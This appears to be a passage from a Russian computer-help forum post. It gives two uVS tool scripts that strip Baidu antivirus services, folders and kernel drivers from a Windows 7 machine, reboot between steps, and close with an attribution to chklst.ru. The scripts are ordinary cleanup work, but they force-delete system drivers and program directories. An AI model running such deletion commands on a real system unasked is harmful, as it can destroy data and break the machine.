delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\3.0.0.3971\BAIDUANSVC.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\BAIDU\BAIDUHIPS\1.1.0.733\BAIDUHIPS.EXE
delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086\BAIDUSDSVC.EXE
delref %Sys32%\DRIVERS\BD0001.SYS
delref %Sys32%\DRIVERS\BD0002.SYS
delref %Sys32%\DRIVERS\BD0003.SYS
delref %Sys32%\DRIVERS\BDARKIT.SYS
delref %Sys32%\DRIVERS\BDDEFENSE.SYS
delref %Sys32%\DRIVERS\BDENHANCEBOOST.SYS
delref %Sys32%\DRIVERS\BDMNETMON.SYS
delref %Sys32%\DRIVERS\BDMWRENCH.SYS
delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\3.0.0.3971\BAIDUANTRAY.EXE
delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086\BAIDUSDTRAY.EXE
areg

после перезагрузки системы, активность данного продукта должна быть исключена. 2. удаляем все (многочисленные) файлы данного антивируса вторым скриптом уже без виртуализации.

;uVS v3.85 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE

deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\2.3.0.2225
deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\3.0.0.3971
deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086
deldirex %SystemDrive%\PROGRAM FILES\COMMON FILES\BAIDU\BAIDUHIPS\1.1.0.733
deldirex %SystemDrive%\PROGRAM FILES\COMMON FILES\BAIDU\BDDOWNLOAD\108
deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086\EXPLUGIN
del %Sys32%\DRIVERS\BD0001.SYS
del %Sys32%\DRIVERS\BD0002.SYS
del %Sys32%\DRIVERS\BD0003.SYS
del %Sys32%\DRIVERS\BDARKIT.SYS
del %Sys32%\DRIVERS\BDDEFENSE.SYS
del %Sys32%\DRIVERS\BDENHANCEBOOST.SYS
del %Sys32%\DRIVERS\BDMNETMON.SYS
del %Sys32%\DRIVERS\BDMWRENCH.SYS
deltmp
delnfr
restart

файл образа автозапуска. (с), chklst.ru